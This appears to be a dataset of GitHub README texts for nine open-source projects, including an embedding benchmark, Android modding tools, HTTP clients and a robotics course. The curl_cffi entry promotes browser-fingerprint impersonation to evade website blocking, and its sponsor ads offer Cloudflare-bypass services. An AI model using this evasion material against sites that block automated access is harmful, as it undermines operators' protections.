text
stringlengths
74
478k
repo
stringlengths
7
106
embeddings-benchmark/mteb;Massive Text Embedding Benchmark Installation | Usage | Leaderboard | Documentation | Citing Installation bash pip install mteb Usage Using a python script (see scripts/run_mteb_english.py and mteb/mtebscripts for more): ```python import mteb from sentence_transformers import SentenceTransformer Define the sentence-transformers model name model_name = "average_word_embeddings_komninos" or directly from huggingface: model_name = "sentence-transformers/all-MiniLM-L6-v2" model = SentenceTransformer(model_name) tasks = mteb.get_tasks(tasks=["Banking77Classification"]) evaluation = mteb.MTEB(tasks=tasks) results = evaluation.run(model, output_folder=f"results/{model_name}") ``` Using CLI ```bash mteb available_tasks mteb run -m sentence-transformers/all-MiniLM-L6-v2 \ -t Banking77Classification \ --verbosity 3 if nothing is specified default to saving the results in the results/{model_name} folder ``` Using multiple GPUs in parallel can be done by just having a custom encode function that distributes the inputs to multiple GPUs like e.g. here or here . Advanced Usage (click to unfold) ## Advanced Usage ### Dataset selection Datasets can be selected by providing the list of datasets, but also * by their task (e.g. "Clustering" or "Classification") ```python tasks = mteb.get_tasks(task_types=["Clustering", "Retrieval"]) # Only select clustering and retrieval tasks ``` * by their categories e.g. "s2s" (sentence to sentence) or "p2p" (paragraph to paragraph) ```python tasks = mteb.get_tasks(categories=["s2s", "p2p"]) # Only select sentence2sentence and paragraph2paragraph datasets ``` * by their languages ```python tasks = mteb.get_tasks(languages=["eng", "deu"]) # Only select datasets which contain "eng" or "deu" (iso 639-3 codes) ``` You can also specify which languages to load for multilingual/cross-lingual tasks like below: ```python import mteb tasks = [ mteb.get_task("AmazonReviewsClassification", languages = ["eng", "fra"]), mteb.get_task("BUCCBitextMining", languages = ["deu"]), # all subsets containing "deu" ] # or you can select specific huggingface subsets like this: from mteb.tasks import AmazonReviewsClassification, BUCCBitextMining evaluation = mteb.MTEB(tasks=[ AmazonReviewsClassification(hf_subsets=["en", "fr"]) # Only load "en" and "fr" subsets of Amazon Reviews BUCCBitextMining(hf_subsets=["de-en"]), # Only load "de-en" subset of BUCC ]) # for an example of a HF subset see "Subset" in the dataset viewer at: https://huggingface.co/datasets/mteb/bucc-bitext-mining ``` There are also presets available for certain task collections, e.g. to select the 56 English datasets that form the "Overall MTEB English leaderboard": ```python from mteb import MTEB_MAIN_EN evaluation = mteb.MTEB(tasks=MTEB_MAIN_EN, task_langs=["en"]) ``` ### Evaluation split You can evaluate only on `test` splits of all tasks by doing the following: ```python evaluation.run(model, eval_splits=["test"]) ``` Note that the public leaderboard uses the test splits for all datasets except MSMARCO, where the "dev" split is used. ### Using a custom model Models should implement the following interface, implementing an `encode` function taking as inputs a list of sentences, and returning a list of embeddings (embeddings can be `np.array`, `torch.tensor`, etc.). For inspiration, you can look at the [mteb/mtebscripts repo](https://github.com/embeddings-benchmark/mtebscripts) used for running diverse models via SLURM scripts for the paper. ```python class MyModel(): def encode( self, sentences: list[str], **kwargs: Any ) -> torch.Tensor | np.ndarray: """Encodes the given sentences using the encoder. Args: sentences: The sentences to encode. **kwargs: Additional arguments to pass to the encoder. Returns: The encoded sentences. """ pass model = MyModel() tasks = mteb.get_task("Banking77Classification") evaluation = MTEB(tasks=tasks) evaluation.run(model) ``` If you'd like to use different encoding functions for query and corpus when evaluating on Retrieval or Reranking tasks, you can add separate methods for `encode_queries` and `encode_corpus`. If these methods exist, they will be automatically used for those tasks. You can refer to the `DRESModel` at `mteb/evaluation/evaluators/RetrievalEvaluator.py` for an example of these functions. ```python class MyModel(): def encode_queries(self, queries: list[str], **kwargs) -> list[np.ndarray] | list[torch.Tensor]: """ Returns a list of embeddings for the given sentences. Args: queries: List of sentences to encode Returns: List of embeddings for the given sentences """ pass def encode_corpus(self, corpus: list[str] | list[dict[str, str]], **kwargs) -> list[np.ndarray] | list[torch.Tensor]: """ Returns a list of embeddings for the given sentences. Args: corpus: List of sentences to encode or list of dictionaries with keys "title" and "text" Returns: List of embeddings for the given sentences """ pass ``` ### Evaluating on a custom dataset To evaluate on a custom task, you can run the following code on your custom task. See [how to add a new task](docs/adding_a_dataset.md), for how to create a new task in MTEB. ```python from mteb import MTEB from mteb.abstasks.AbsTaskReranking import AbsTaskReranking from sentence_transformers import SentenceTransformer class MyCustomTask(AbsTaskReranking): ... model = SentenceTransformer("average_word_embeddings_komninos") evaluation = MTEB(tasks=[MyCustomTask()]) evaluation.run(model) ``` Documentation | Documentation | | | ------------------------------ | ---------------------- | | 📋 Tasks | Overview of available tasks | | 📈 Leaderboard | The interactive leaderboard of the benchmark | | 🤖 Adding a model | Information related to how to submit a model to the leaderboard | | 👩‍🔬 Reproducible workflows | Information related to how to reproduce and create reproducible workflows with MTEB | | 👩‍💻 Adding a dataset | How to add a new task/dataset to MTEB |  | 👩‍💻 Adding a leaderboard tab | How to add a new leaderboard tab to MTEB |  | 🤝 Contributing | How to contribute to MTEB and set it up for development | | 🌐 MMTEB | An open-source effort to extend MTEB to cover a broad set of languages | Citing MTEB was introduced in " MTEB: Massive Text Embedding Benchmark ", feel free to cite: bibtex @article{muennighoff2022mteb, doi = {10.48550/ARXIV.2210.07316}, url = {https://arxiv.org/abs/2210.07316}, author = {Muennighoff, Niklas and Tazi, Nouamane and Magne, Lo{\"\i}c and Reimers, Nils}, title = {MTEB: Massive Text Embedding Benchmark}, publisher = {arXiv}, journal={arXiv preprint arXiv:2210.07316}, year = {2022} } You may also want to read and cite the amazing work that has extended MTEB & integrated new datasets: - Shitao Xiao, Zheng Liu, Peitian Zhang, Niklas Muennighoff. " C-Pack: Packaged Resources To Advance General Chinese Embedding " arXiv 2023 - Michael Günther, Jackmin Ong, Isabelle Mohr, Alaeddine Abdessalem, Tanguy Abel, Mohammad Kalim Akram, Susana Guzman, Georgios Mastrapas, Saba Sturua, Bo Wang, Maximilian Werk, Nan Wang, Han Xiao. " Jina Embeddings 2: 8192-Token General-Purpose Text Embeddings for Long Documents " arXiv 2023 - Silvan Wehrli, Bert Arnrich, Christopher Irrgang. " German Text Embedding Clustering Benchmark " arXiv 2024 - Orion Weller, Benjamin Chang, Sean MacAvaney, Kyle Lo, Arman Cohan, Benjamin Van Durme, Dawn Lawrie, Luca Soldaini. " FollowIR: Evaluating and Teaching Information Retrieval Models to Follow Instructions " arXiv 2024 - Dawei Zhu, Liang Wang, Nan Yang, Yifan Song, Wenhao Wu, Furu Wei, Sujian Li. " LongEmbed: Extending Embedding Models for Long Context Retrieval " arXiv 2024 - Kenneth Enevoldsen, Márton Kardos, Niklas Muennighoff, Kristoffer Laigaard Nielbo. " The Scandinavian Embedding Benchmarks: Comprehensive Assessment of Multilingual and Monolingual Text Embedding " arXiv 2024 For works that have used MTEB for benchmarking, you can find them on the leaderboard .;MTEB: Massive Text Embedding Benchmark;benchmark,clustering,information-retrieval,sentence-transformers,sts,text-embedding,retrieval,neural-search,semantic-search,sbert
embeddings-benchmark/mteb
siavash79/PixelXpert;For Pixel Stock Android 12 and 13 (Up to Nov 2022 - AOSP 13R8): For Pixel Stock Android 13 and 14 (starting with Dec 2022 security patch): PixelXpert Support Channels: This is a mixed Xposed+Magisk module, which is made to allow customizations that are not originally designed in AOSP (Android Open Source Project). Please read thorough below before reaching to download links Features: Currently, PixelXpert offers customizations on different aspects of system framework and SystemUI, including: - Status bar - Quick Settings panel - Lock screen - Notifications - Gesture Navigations - Phone & Dialer - Hotspot - Package Manager - Screen properties Compatibility: PixelXpert is only fully compatible with pixel stock firmware. Any custom ROM is not tested and may not be fully (or even at all) compatible. Here is the compatibility chart according to different android versions and QPRs: Android 12/12.1: final version: v2.4.1 . Android 13 stable QPR1 (up until November 2022 firmware): final version: v.2.4.1 . Android 13 stable QPR3 (starting from December 2022 firmware till QPR3): starting with v.2.5 up until the latest stable/canary versions. Android 14: starting with v.2.9 up until the latest stable/canary versions. Android 14 QPR2 beta builds not yet fully compatible. Please be patient until we iron out the incompatibilities caused by code changes in source (source code not available for QPR beta) Prerequisites: Compatible ROM (see Compatibility text above) Device Rooted with Magisk 24.2+ or KSU LSPosed (Zygisk Version preferred) How to install: Download the stable magisk module according to your firmware as mentioned above Install in magisk/KSU Reboot (no bootloops are expected) Open PixelXpert app and apply changes P.S. For KSU, there is an extra step of granting root access to PixelXpert as it doesn't request automatically as in Magisk Release Variants: The module is also released in 2 flavors with different manual download and update procedures. But both can utilize automated updates through magisk manager, or through in-app updater (for canary, updates will not count against the module's download count). Stable release: - Manual Install/Update: through repository's Github release page (link below) AND through in-app updater Canary release: - Manual Install/Update: through repository's Actions page and telegram channel (latest version is available from here also) *No matter which flavor you're on, you can always switch to the other one with in-app updater Translations: Want to help translate PixelXpert to your language? Visit Crowdin Donations: This project is open source and free for usage, build or copy. However, if you really feel like it, you can donate to your favorite charity on our behalf, or help funding education for children in need, at Child Foundation Credits / Thanks: Android Team @topjohnwu for Magisk @rovo89 for Xposed Team LSPosed apsun@github for remote-preferences @nijel8 for double-tap to wake UI design: - @Mahmud0808 Graphic design: - JstormZx@Telegram (Icon and Banner) - RKBDI@Telegram (Icon) Brought to you by: @siavash79 & @ElTifo;mixed Xposed+Magisk module for customization of Google Pixel rom of Android 12+;customization,magisk-module,xposed-module
siavash79/PixelXpert
yifeikong/curl_cffi;curl_cffi Documentation | 中文 README Python binding for curl-impersonate via cffi . Unlike other pure python http clients like httpx or requests , curl_cffi can impersonate browsers' TLS/JA3 and HTTP/2 fingerprints. If you are blocked by some website for no obvious reason, you can give curl_cffi a try. Scrapfly is an enterprise-grade solution providing Web Scraping API that aims to simplify the scraping process by managing everything: real browser rendering, rotating proxies, and fingerprints (TLS, HTTP, browser) to bypass all major anti-bots. Scrapfly also unlocks the observability by providing an analytical dashboard and measuring the success rate/block rate in detail. Scrapfly is a good solution if you are looking for a cloud-managed solution for curl_cffi . If you are managing TLS/HTTP fingerprint by yourself with curl_cffi , they also maintain a curl to python converter . Features Supports JA3/TLS and http2 fingerprints impersonation. Much faster than requests/httpx, on par with aiohttp/pycurl, see benchmarks . Mimics requests API, no need to learn another one. Pre-compiled, so you don't have to compile on your machine. Supports asyncio with proxy rotation on each request. Supports http 2.0, which requests does not. Supports websocket. ||requests|aiohttp|httpx|pycurl|curl_cffi| |---|---|---|---|---|---| |http2|❌|❌|✅|✅|✅| |sync|✅|❌|✅|✅|✅| |async|❌|✅|✅|❌|✅| |websocket|❌|✅|❌|❌|✅| |fingerprints|❌|❌|❌|❌|✅| |speed|🐇|🐇🐇|🐇|🐇🐇|🐇🐇| Install pip install curl_cffi --upgrade This should work on Linux, macOS and Windows out of the box. If it does not work on you platform, you may need to compile and install curl-impersonate first and set some environment variables like LD_LIBRARY_PATH . To install beta releases: pip install curl_cffi --upgrade --pre To install unstable version from GitHub: git clone https://github.com/yifeikong/curl_cffi/ cd curl_cffi make preprocess pip install . Usage curl_cffi comes with a low-level curl API and a high-level requests -like API. Use the latest impersonate versions, do NOT copy chrome110 here without changing. requests-like ```python from curl_cffi import requests Notice the impersonate parameter r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110") print(r.json()) output: {..., "ja3n_hash": "aa56c057ad164ec4fdcb7a5a283be9fc", ...} the js3n fingerprint should be the same as target browser To keep using the latest browser version as curl_cffi updates, simply set impersonate="chrome" without specifying a version. Other similar values are: "safari" and "safari_ios" r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome") http/socks proxies are supported proxies = {"https": "http://localhost:3128"} r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110", proxies=proxies) proxies = {"https": "socks://localhost:3128"} r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110", proxies=proxies) ``` Sessions ```python s = requests.Session() httpbin is a http test website, this endpoint makes the server set cookies s.get("https://httpbin.org/cookies/set/foo/bar") print(s.cookies) ]> retrieve cookies again to verify r = s.get("https://httpbin.org/cookies") print(r.json()) {'cookies': {'foo': 'bar'}} ``` Supported impersonate versions, as supported by my fork of curl-impersonate : However, only Chrome-like browsers are supported. Firefox support is tracked in #59 . Browser versions will be added only when their fingerprints change. If you see a version, e.g. chrome122, were skipped, you can simply impersonate it with your own headers and the previous version. chrome99 chrome100 chrome101 chrome104 chrome107 chrome110 chrome116 [1] chrome119 [1] chrome120 [1] chrome123 [3] chrome124 [3] chrome99_android edge99 edge101 safari15_3 [2] safari15_5 [2] safari17_0 [1] safari17_2_ios [1] Notes: 1. Added in version 0.6.0 . 2. Fixed in version 0.6.0 , previous http2 fingerprints were not correct . 3. Added in version 0.7.0 . asyncio ```python from curl_cffi.requests import AsyncSession async with AsyncSession() as s: r = await s.get("https://example.com") ``` More concurrency: ```python import asyncio from curl_cffi.requests import AsyncSession urls = [ "https://google.com/", "https://facebook.com/", "https://twitter.com/", ] async with AsyncSession() as s: tasks = [] for url in urls: task = s.get(url) tasks.append(task) results = await asyncio.gather(*tasks) ``` WebSockets ```python from curl_cffi.requests import Session, WebSocket def on_message(ws: WebSocket, message): print(message) with Session() as s: ws = s.ws_connect( "wss://api.gemini.com/v1/marketdata/BTCUSD", on_message=on_message, ) ws.run_forever() ``` For low-level APIs, Scrapy integration and other advanced topics, see the docs for more details. Acknowledgement Originally forked from multippt/python_curl_cffi , which is under the MIT license. Headers/Cookies files are copied from httpx , which is under the BSD license. Asyncio support is inspired by Tornado's curl http client. The WebSocket API is inspired by websocket_client . [Sponsor] Bypass Cloudflare with API Yescaptcha is a proxy service that bypasses Cloudflare and uses the API interface to obtain verified cookies (e.g. cf_clearance ). Click here to register: https://yescaptcha.com/i/stfnIO [Sponsor] ScrapeNinja ScrapeNinja is a web scraping API with two engines: fast, with high performance and TLS fingerprint; and slower with a real browser under the hood. ScrapeNinja handles headless browsers, proxies, timeouts, retries, and helps with data extraction, so you can just get the data in JSON. Rotating proxies are available out of the box on all subscription plans. Sponsor Citation If you find this project useful, please cite it as below: @software{Kong2023, author = {Yifei Kong}, title = {curl_cffi - A Python HTTP client for impersonating browser TLS and HTTP/2 fingerprints}, year = {2023}, publisher = {GitHub}, journal = {GitHub repository}, url = {https://github.com/yifeikong/curl_cffi}, };Python binding for curl-impersonate via cffi. A http client that can impersonate browser tls/ja3/http2 fingerprints.;curl,http-client,curl-impersonate,http,https,ja3,ja3-fingerprint,tls-fingerprint,fingerprinting,web-scraping
yifeikong/curl_cffi
ecyrbe/zodios;Zodios Zodios is a typescript api client and an optional api server with auto-completion features backed by axios and zod and express Documentation https://user-images.githubusercontent.com/633115/185851987-554f5686-cb78-4096-8ff5-c8d61b645608.mp4 What is it ? It's an axios compatible API client and an optional expressJS compatible API server with the following features: really simple centralized API declaration typescript autocompletion in your favorite IDE for URL and parameters typescript response types parameters and responses schema thanks to zod response schema validation powerfull plugins like fetch adapter or auth automatic injection all axios features available @tanstack/query wrappers for react and solid (vue, svelte, etc, soon) all expressJS features available (middlewares, etc.) Table of contents: What is it ? Install Client and api definitions : Server : How to use it on client side ? Declare your API with zodios API definition format Full documentation Ecosystem Roadmap Dependencies Install Client and api definitions : ```bash npm install @zodios/core ``` or ```bash yarn add @zodios/core ``` Server : ```bash npm install @zodios/core @zodios/express ``` or ```bash yarn add @zodios/core @zodios/express ``` How to use it on client side ? For an almost complete example on how to use zodios and how to split your APIs declarations, take a look at dev.to example. Declare your API with zodios Here is an example of API declaration with Zodios. ```typescript import { Zodios } from "@zodios/core"; import { z } from "zod"; const apiClient = new Zodios( "https://jsonplaceholder.typicode.com", // API definition [ { method: "get", path: "/users/:id", // auto detect :id and ask for it in apiClient get params alias: "getUser", // optional alias to call this endpoint with it description: "Get a user", response: z.object({ id: z.number(), name: z.string(), }), }, ], ); ``` Calling this API is now easy and has builtin autocomplete features : typescript // typed auto-complete path auto-complete params // ▼ ▼ ▼ const user = await apiClient.get("/users/:id", { params: { id: 7 } }); console.log(user); It should output js { id: 7, name: 'Kurtis Weissnat' } You can also use aliases : typescript // typed alias auto-complete params // ▼ ▼ ▼ const user = await apiClient.getUser({ params: { id: 7 } }); console.log(user); API definition format typescript type ZodiosEndpointDescriptions = Array<{ method: 'get'|'post'|'put'|'patch'|'delete'; path: string; // example: /posts/:postId/comments/:commentId alias?: string; // example: getPostComments immutable?: boolean; // flag a post request as immutable to allow it to be cached with react-query description?: string; requestFormat?: 'json'|'form-data'|'form-url'|'binary'|'text'; // default to json if not set parameters?: Array<{ name: string; description?: string; type: 'Path'|'Query'|'Body'|'Header'; schema: ZodSchema; // you can use zod `transform` to transform the value of the parameter before sending it to the server }>; response: ZodSchema; // you can use zod `transform` to transform the value of the response before returning it status?: number; // default to 200, you can use this to override the sucess status code of the response (only usefull for openapi and express) responseDescription?: string; // optional response description of the endpoint errors?: Array<{ status: number | 'default'; description?: string; schema: ZodSchema; // transformations are not supported on error schemas }>; }>; Full documentation Check out the full documentation or following shortcuts. API definition Http client React hooks Solid hooks API server Nextjs integration Ecosystem openapi-zod-client : generate a zodios client from an openapi specification @zodios/express : full end to end type safety like tRPC, but for REST APIs @zodios/plugins : some plugins for zodios @zodios/react : a react-query wrapper for zodios @zodios/solid : a solid-query wrapper for zodios Roadmap for v11 for Zod / Io-Ts` : By using the TypeProvider pattern we can now make zodios validation agnostic. Implement at least ZodTypeProvider and IoTsTypeProvider since they both support input and output type inferrence openapi generation will only be compatible with zod though Not a breaking change so no codemod needed [x] MonoRepo: Zodios will become a really large project so maybe migrate to turbo repo + pnpm not a breaking change [ ] Transform: By default, activate transforms on backend and disable on frontend (today it's the opposite), would make server transform code simpler since with this option we could make any transforms activated not just zod defaults. Rationale being that transformation can be viewed as business code that should be kept on backend breaking change => codemod to keep current defaults by setting them explicitly [x] Axios: Move Axios client to it's own package @zodios/axios and keep @zodios/core with only common types and helpers Move plugins to @zodios/axios-plugins breaking change => easy to do a codemod for this [x] Fetch: Create a new Fetch client with almost the same features as axios, but without axios dependency @zodios/fetch Today we have fetch support with a plugin for axios instance (zodios maintains it's own axios network adapter for fetch). But since axios interceptors are not used by zodios plugins, we can make fetch implementation lighter than axios instance. Create plugins package @zodios/fetch-plugins Not sure it's doable without a lot of effort to keep it in sync/compatible with axios client new feature, so no codemod needed [ ] React/Solid: make ZodiosHooks independant of Zodios client instance (axios, fetch) not a breaking change, so no codemod needed [x] Client Request Config uniform Query/Mutation with body sent on the config and not as a standalone object. This would allow to not do client.deleteUser(undefined, { params: { id: 1 } }) but simply client.deleteUser({ params: { id: 1 } }) breaking change, so a codemod would be needed, but might be difficult to implement [x] Mock/Tests: if we implement an abstraction layer for client instance, relying on moxios to mock APIs response will likely not work for fetch implementation. create a @zodios/testing package that work for both axios/fetch clients new feature, so no breaking change (no codemod needed) You have other ideas ? Let me know ! Dependencies Zodios even when working in pure Javascript is better suited to be working with Typescript Language Server to handle autocompletion. So you should at least use the one provided by your IDE (vscode integrates a typescript language server) However, we will only support fixing bugs related to typings for versions of Typescript Language v4.5 Earlier versions should work, but do not have TS tail recusion optimisation that impact the size of the API you can declare. Also note that Zodios do not embed any dependency. It's your Job to install the peer dependencies you need. Internally Zodios uses these libraries on all platforms : - zod - axios;typescript http client and server with zod validation;zod,http,typescript,api,nodejs,openapi,rest
ecyrbe/zodios
michiganrobotics/rob501;Robotics 501: Mathematics for Robotics ROB 501: Mathematics for Robotics, is a graduate-level course at the University of Michigan that introduces applied mathematics for robotics engineers. Topics include vector spaces, orthogonal bases, projection theorem, least squares, matrix factorizations, Kalman filter and underlying probabilistic concepts, norms, convergent sequences, contraction mappings, Newton Raphson algorithm, local vs global convergence in nonlinear optimization, convexity, linear and quadratic programs. This offering of the course is from Fall 2018. Prerequisites It is assumed that students know basic matrix algebra, such as how to multiply and invert matrices, what is the rank of a matrix, and how to compute eigenvectors; know how to compute means and variances given a density of a continuous random variable, and conditional probability and how to compute it; know vector calculus and will review how to compute gradients of functions and what is the method of Lagrange multipliers; simple properties of complex numbers; and how to use MATLAB, including plotting, various types of multiplication, such as * vs .* (star vs dot star), writing a for loop, or finding help. Lecture Videos, Textbook & Notes All lecture videos are available on YouTube: ROB 501 Fall 2018 videos Also, the textbook , lecture notes and handouts are available. Recitatioins Recitation questions and answers are both available. Course Plan | Lecture | Topic | YouTube | Assignments Due | |---------|------------------------------------------------------------|----------------------------------------------------------------------------------------------|--------------------| | 1 | Intro & Proofs | Video | | | 2 | Induction, Fundamental Theorem, & Contradiction | Video | | | 3 | Abstract Linear Algebra | Video | | | 4 | Subspaces & Linear Independence | Video | Homework 1 | | 5 | Basis Vectors & Dimension | Video | | | 6 | Linear Operators & Eigenvalues | Video | Homework 2 | | 7 | Similar Matrices & Norms | Video | | | 8 | Inner Product Spaces | Video | Homework 3 | | 9 | Projection Theorem & Gram-Schmidt | Video | | | 10 | Normal Equations & Least Squares | Video | Homework 4 | | 11 | Symmetric & Orthogonal Matrices | Video | | | 12 | Positive Semi-Definite Matrices & Schur Complement Theorem | Video | Homework 5 | | 13 | Recursive Least Squares & Kalman Filter | Video | | | 14 | Least Squares & Probability | Video | | | 15 | Best Linear Unbiased Estimator | Video | Homework 6 | | 16 | QR Factorization | Video | Exam 1 | | 17 | Modified Gram-Schmidt & Minimum Variance Estimator | Video | | | 18 | Probability Space & Random Variables | Video | | | 19 | Gaussian Random Vectors | Video | Homework 7 | | 20 | Real Analysis & Normed Spaces | Video | | | 21 | Real Analysis & Interior of a Set | Video | Homework 8 | | 22 | Newton-Raphson Algorithm | Video | | | 23 | Cauchy Sequences | Video | Homework 9 | | 24 | Continuous Functions | Video | | | 25 | Weierstrass Theorem | Video | | | 26 | Final Class & Linear Programming | Video | Homework 10 & Exam 2 | A more detailed course plan is available. Credits Jessy Grizzle, Director, Michigan Robotics Nils Smit-Anseeuw License All code is licensed under the GNU General Public License v3.0 . All other content, including textbooks, homeworks, and video, is licensed under the Creative Commons Attribution-NonCommericial 4.0 (CC BY-NC 4.0) . For more University of Michigan Robotics Michigan Robotics Twitter Michigan Robotics Instagram;Mathematics for Robotics;[]
michiganrobotics/rob501
bullet-train-co/bullet_train;Bullet Train Application Template If you're new to Bullet Train, start with the Bullet Train Developer Documentation and the Getting Started guide. You should also join the community Discord server ! Building a New Application with Bullet Train If you're building a new application with Bullet Train, you don't want to "Fork" the template repository on GitHub. Instead, you should: Clone the template repository: git clone git@github.com:bullet-train-co/bullet_train.git your_new_project_name Enter the project directory: cd your_new_project_name Run the configuration and setup scripts: bin/configure bin/setup Boot your application: bin/dev Visit http://localhost:3000 . Cloud Development with Gitpod Clicking this button will set up a new Bullet Train project for development on Gitpod . Open-source development sponsored by: Provisioning a Production Environment You can use this public repository to provision a new application and then push your private application code there later. Render Clicking this button will take you to the first step of a process that, when completed, will provision production-grade infrastructure for your Bullet Train application which will cost about $30/month . When you're done deploying to Render, you need to go into "Dashboard" > "web", copy the server URL, and then go into "Env Groups" > "settings" and paste the URL into the value for BASE_URL . Heroku Clicking this button will take you to the first step of a process that, when completed, will provision production-grade infrastructure and services for your Bullet Train application which will cost about $140/month . Once that process has completed, be sure to complete the other steps from the Deploying to Heroku documentation. Contribute to Bullet Train If you're looking contribute to Bullet Train, you should "Fork" this template repository on GitHub, like so: Visit https://github.com/bullet-train-co/bullet_train. Click "Fork" in the top-right corner. Select the account where you want to fork the repository. Click the "Code" button on the new repository and copy the SSH path. Clone your forked repository using the SSH path you copied, like so: git clone git@github.com:your-account/bullet_train.git cd bullet_train Run the setup script: bin/setup Start the application: bin/dev [!NOTE] Optional: If you have ngrok installed, uncomment ngrok: ngrok http 3000 from Procfile.dev and run bin/set-ngrok-url to set BASE_URL to a publically accessible domain. Run bin/set-ngrok-url after restarting ngrok to update BASE_URL to the current public url. Visit http://localhost:3000. This README.md file will be replaced with README.example.md after running bin/configure .;The Open Source Ruby on Rails SaaS Template;rails,saas,bullet-train
bullet-train-co/bullet_train
upstash/ratelimit-js;Upstash Rate Limit [!NOTE] This project is in GA Stage. The Upstash Professional Support fully covers this project. It receives regular updates, and bug fixes. The Upstash team is committed to maintaining and improving its functionality. It is the only connectionless (HTTP based) rate limiting library and designed for: Serverless functions (AWS Lambda, Vercel ....) Cloudflare Workers & Pages Vercel Edge Fastly Compute@Edge Next.js, Jamstack ... Client side web/mobile applications WebAssembly and other environments where HTTP is preferred over TCP. Quick Start Install npm bash npm install @upstash/ratelimit Deno ts import { Ratelimit } from "https://cdn.skypack.dev/@upstash/ratelimit@latest"; Create database Create a new redis database on upstash . See here for documentation on how to create a redis instance. Basic Usage ```ts import { Ratelimit } from "@upstash/ratelimit"; // for deno: see above import { Redis } from "@upstash/redis"; // see below for cloudflare and fastly adapters // Create a new ratelimiter, that allows 10 requests per 10 seconds const ratelimit = new Ratelimit({ redis: Redis.fromEnv(), limiter: Ratelimit.slidingWindow(10, "10 s"), analytics: true, /* * Optional prefix for the keys used in redis. This is useful if you want to share a redis * instance with other applications and want to avoid key collisions. The default prefix is * "@upstash/ratelimit" / prefix: "@upstash/ratelimit", }); // Use a constant string to limit all requests with a single ratelimit // Or use a userID, apiKey or ip address for individual limits. const identifier = "api"; const { success } = await ratelimit.limit(identifier); if (!success) { return "Unable to process at this time"; } doExpensiveCalculation(); return "Here you go!"; ``` For more information on getting started, you can refer to our documentation . Here's a complete nextjs example Documentation See the documentation for more information details about this package. Contributing Database Create a new redis database on upstash and copy the url and token. Running tests To run the tests, you will need to set some environment variables. Here is a list of variables to set: - UPSTASH_REDIS_REST_URL - UPSTASH_REDIS_REST_TOKEN - US1_UPSTASH_REDIS_REST_URL - US1_UPSTASH_REDIS_REST_TOKEN - APN_UPSTASH_REDIS_REST_URL - APN_UPSTASH_REDIS_REST_TOKEN - EU2_UPSTASH_REDIS_REST_URL - EU2_UPSTASH_REDIS_REST_TOKEN You can create a single Upstash Redis and use its URL and token for all four above. Once you set the environment variables, simply run: sh pnpm test;Rate limiting library for serverless runtimes;rate-limiting,redis,serverless,upstash,upstash-ratelimit,upstash-sdk
upstash/ratelimit-js
PeterStrick/ViVeTool-GUI;ViVeTool GUI Windows Feature Control GUI based on ViVeTool What is ViVeTool GUI? ViVeTool GUI lets you easily enable, disable and search for new hidden Features in Windows Insider Builds, with the use of a Button and a pretty UI. Disclaimer. No one, including me / PeterStrick , the creators of ViVe and ViVeTool or the creators of mach2 are responsible for any damage or unintended side effects, this program might cause to your computer, by changing the Windows Feature Store. Use this program at your own risk. How to use it? Using it is simple, Either: Select the Build for which you want to enable or disable features for. Wait for it to load in, open one of the Groups by pressing the Arrow, and select the Feature that you are looking for. Press on Perform Action and perform your desired action for the entered feature ID. Or: 1. Press on "Manually change a Feature" (F12) 2. Enter a Feature ID 3. Press on Perform Action and perform your desired action for the selected feature. What are the additional features? Apart from being able to manage features, ViVeTool GUI let´s you also: - Load in a Feature List of other Builds - Search for Features - Sort Features by Feature Name, Feature ID or Feature State - Group Features by: Always Enabled, Always Disabled, Enabled by Default, Disabled by Default and Modifiable - Copy Feature Names and IDs by right-clicking them - Switch between Dark and Light Mode (Setting get´s saved and applied on Start) - Automatically load the latest Feature List when starting ViVeTool GUI - Scan a Windows Build for Hidden Features to create your own Feature List - Use ViVeTool GUI in multiple translated Languages - Fix the LastKnownGood Store, as well as the A/B Testing Priorities for ViVeTool Features - and at last, view the About Box by either pressing on the About Icon, or selecting the "About..." Item in the Application System Menu. What are the System Requirements? Since ViVeTool GUI uses the ViVe API, Windows 10 Build 18963 (Version 2004) and newer is the only OS Requirement. Apart from that, the only Requirement is .Net Framework 4.8 Why not just use ViVeTool? Using ViVeTool GUI is more easier and user-friendly, besides it lets you also search for features and enable them with a few clicks. Licensing ViVeTool GUI uses Icons from icons8.com ViVeTool GUI is inspired by ViVeTool and uses the ViVe API ViVeTool GUI uses files from mach2 for the Build Combo Box. ViVeTool GUI - Feature Scanner uses mach2 to create it's Feature Lists;Windows Feature Control GUI based on ViVe / ViVeTool;windows10,windows-10,windows11,windows-11,windows,windows-features,vive,vivetool,mach2,feature-control
PeterStrick/ViVeTool-GUI
twoyi/twoyi;Due to the complexity of the project and lack of any revenue, the project has been discontinued. Twoyi Platform A lightweight Android container [![contributions welcome](https://img.shields.io/badge/Contributions-welcome-brightgreen?logo=github)](CODE_OF_CONDUCT.md) [![Website](https://img.shields.io/badge/Website-available-brightgreen?logo=e)](https://twoyi.io) Made with ❤︎ by weishu README 中文版 Introduction Twoyi is a lightweight Android container. It runs a nearly complete Android system as a normal app (no root required) on Android. Additionally, it supports Android 8.1 ~ 12. Capability Use Taichi·Yang without unlocking the bootloader. Xposed, EdXposed and LSPosed will be supported. Use root on non-rooted devices. Use a few Magisk modules. Implement additional system components such as virtual camera by virtualizing the HAL layer. Do security research such as shelling. Features Twoyi is a rootless Android system-level container, which runs a nearly complete Android system as a normal app and is mostly isolated from the main system. The internal Android version is Android 8.1 and Android 10 will be supported. Booting up twoyi is very fast (within three seconds) except for the initialization process. Twoyi is an open source project. The internal system of twoyi will be fully customizable. Because its system is open source, you can fork the project to compile your own system. You can also customize the system components, such as the HAL layer to implement virtual cameras, virtual sensors and other special features. Building Twoyi contains two parts: The twoyi app, which is actually a UI rendering engine. The internal ROM of twoyi. This repository contains the twoyi app, and the twoyi ROM is currently being turned into open-source. Therefore, at this moment, the ROM cannot be compiled from source yet. Build the App manually Install Rust Twoyi is partially written in Rust, so it's nessesary to install Rust and Cargo first. Install cargo-xdk Please refer to cargo-xdk . You can check if it is installed by running ./gradlew cargoBuild . If it succeeded, you will see libtwoyi.so in app/src/main/jniLibs/arm64-v8a . PS. Please use ndk v22 or lower, otherwise it may fail. Integrating rootfs Currently you cannot build the ROM yourself, instead you can use the prebuilt ROM. To do that, extract rootfs.7z from the official release apk and copy it to app/src/main/assets . Build the app with Android Studio Build it with Android Studio normally. Build the ROM WIP Discussion Telegram Group Contact Me twsxtd@gmail.com;A lightweight Android container on Android;twoyi,virtual,android
twoyi/twoyi
